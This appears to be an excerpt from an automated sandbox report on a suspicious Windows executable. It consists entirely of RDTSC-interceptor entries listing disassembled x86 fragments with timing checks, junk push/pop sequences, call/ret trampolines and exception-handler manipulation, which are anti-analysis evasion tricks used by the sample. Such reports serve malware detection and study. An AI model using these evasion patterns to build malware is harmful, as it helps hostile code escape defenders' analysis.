Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA5BC second address: BDA5C6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F423D327E26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA5C6 second address: BDA5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE751F second address: BE752B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F423D327E26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE752B second address: BE752F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE752F second address: BE7533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE7533 second address: BE7551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F423CC2AB20h 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE77DF second address: BE77E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE77E3 second address: BE77E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE7938 second address: BE7954 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E38h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE7954 second address: BE7979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F423CC2AB29h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE7979 second address: BE7996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423D327E33h 0x00000009 jbe 00007F423D327E26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE7996 second address: BE79E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB20h 0x00000007 jmp 00007F423CC2AB21h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F423CC2AB20h 0x00000015 jmp 00007F423CC2AB27h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE79E4 second address: BE79E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE7CFC second address: BE7D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F423CC2AB26h 0x00000009 jmp 00007F423CC2AB1Dh 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEB7A1 second address: BEB7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEB7A5 second address: BEB7D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F423CC2AB1Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F423CC2AB16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEB7D4 second address: BEB7DE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F423D327E26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEEE14 second address: BEEE1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEEE1A second address: BEEE2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423D327E2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBB675 second address: BBB6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F423CC2AB1Ch 0x0000000b jmp 00007F423CC2AB24h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 pushad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBB6A2 second address: BBB6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F423D327E35h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F423D327E2Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF4DA4 second address: BF4DA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF4DA8 second address: BF4DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F423D327E2Ch 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF6C3C second address: BF6C42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF6CD4 second address: BF6CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF6CD9 second address: BF6D40 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F423CC2AB29h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 0CF28BF4h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F423CC2AB18h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c jc 00007F423CC2AB21h 0x00000032 jnp 00007F423CC2AB1Bh 0x00000038 push 189A5225h 0x0000003d push eax 0x0000003e push edx 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 pop edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF6E71 second address: BF6E89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F423D327E33h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF71BC second address: BF71CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF71CC second address: BF71E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423D327E39h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF71E9 second address: BF71ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF74A2 second address: BF74AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF78D1 second address: BF78D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8427 second address: BF8431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F423D327E26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8431 second address: BF8435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8435 second address: BF8444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8444 second address: BF845C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF845C second address: BF8473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423D327E33h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8473 second address: BF84EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sub dword ptr [ebp+122D2EB9h], ebx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F423CC2AB18h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b jmp 00007F423CC2AB25h 0x00000030 mov esi, edx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F423CC2AB18h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000017h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e movsx edi, bx 0x00000051 xchg eax, ebx 0x00000052 je 00007F423CC2AB24h 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF84EB second address: BF8500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F423D327E26h 0x0000000a popad 0x0000000b push eax 0x0000000c jc 00007F423D327E34h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF9D7A second address: BF9DDA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push edi 0x0000000a mov dword ptr [ebp+122D3750h], esi 0x00000010 pop esi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F423CC2AB18h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F423CC2AB18h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push ecx 0x0000004f pop ecx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF9DDA second address: BF9DE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF9DE0 second address: BF9DE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF9DE6 second address: BF9DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF9DEA second address: BF9DEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB1BA second address: BFB1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC909 second address: BFC90E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB666E second address: BB6685 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F423D327E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007F423D327E26h 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C00940 second address: C00944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0249A second address: C024C0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F423D327E28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F423D327E37h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFAF25 second address: BFAF34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFDBFB second address: BFDC09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C024C0 second address: C024C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C024C6 second address: C024CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C03BB9 second address: C03C1E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F423CC2AB18h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007F423CC2AB25h 0x00000014 push 00000000h 0x00000016 sub ebx, dword ptr [ebp+122D2EBEh] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F423CC2AB18h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 mov ebx, dword ptr [ebp+122D2D7Bh] 0x0000003e xchg eax, esi 0x0000003f je 00007F423CC2AB20h 0x00000045 pushad 0x00000046 push ebx 0x00000047 pop ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C02D96 second address: C02DAC instructions: 0x00000000 rdtsc 0x00000002 je 00007F423D327E2Ch 0x00000008 ja 00007F423D327E26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C02DAC second address: C02DB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C04D36 second address: C04D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423D327E33h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C04E46 second address: C04E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C04E4D second address: C04EDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jg 00007F423D327E2Eh 0x00000010 nop 0x00000011 mov bl, EAh 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007F423D327E28h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b mov eax, dword ptr [ebp+122D0DB9h] 0x00000041 movzx edi, dx 0x00000044 push FFFFFFFFh 0x00000046 push 00000000h 0x00000048 push ecx 0x00000049 call 00007F423D327E28h 0x0000004e pop ecx 0x0000004f mov dword ptr [esp+04h], ecx 0x00000053 add dword ptr [esp+04h], 0000001Ah 0x0000005b inc ecx 0x0000005c push ecx 0x0000005d ret 0x0000005e pop ecx 0x0000005f ret 0x00000060 mov edi, esi 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 push edi 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C04EDD second address: C04EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C04EE2 second address: C04EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423D327E30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C04EF6 second address: C04EFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C06BE1 second address: C06BE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C06BE7 second address: C06BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07D7C second address: C07DE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jl 00007F423D327E2Eh 0x00000011 jnp 00007F423D327E28h 0x00000017 nop 0x00000018 or dword ptr [ebp+122D1DD5h], edi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007F423D327E28h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122D2EAAh], eax 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 jnp 00007F423D327E2Ch 0x0000004a jns 00007F423D327E26h 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07DE2 second address: C07DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07DE6 second address: C07DFF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 je 00007F423D327E28h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F423D327E26h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C08C9B second address: C08C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C08C9F second address: C08CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C09CF9 second address: C09D00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C09D00 second address: C09D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jnl 00007F423D327E2Ch 0x0000000f pushad 0x00000010 jmp 00007F423D327E33h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C08F22 second address: C08F37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C08F37 second address: C08F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0ACC9 second address: C0ACEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F423CC2AB1Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0CD40 second address: C0CD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0EE19 second address: C0EE23 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F423CC2AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0ADED second address: C0ADF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0ADF1 second address: C0AE67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F423CC2AB18h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jns 00007F423CC2AB22h 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov bh, A9h 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a sbb ebx, 4BB784C0h 0x00000040 mov eax, dword ptr [ebp+122D0461h] 0x00000046 mov bl, 7Bh 0x00000048 push FFFFFFFFh 0x0000004a clc 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F423CC2AB26h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C10CCE second address: C10CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C10CD6 second address: C10D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F423CC2AB22h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 pushad 0x00000016 jmp 00007F423CC2AB1Ch 0x0000001b sub ebx, 3F8598D5h 0x00000021 popad 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007F423CC2AB18h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 mov eax, dword ptr [ebp+122D078Dh] 0x00000049 movzx edi, dx 0x0000004c push FFFFFFFFh 0x0000004e mov bx, 68A2h 0x00000052 nop 0x00000053 jmp 00007F423CC2AB24h 0x00000058 push eax 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C18AA8 second address: C18AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C18D75 second address: C18D7C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1BB54 second address: C1BB81 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F423D327E37h 0x0000000e jl 00007F423D327E26h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
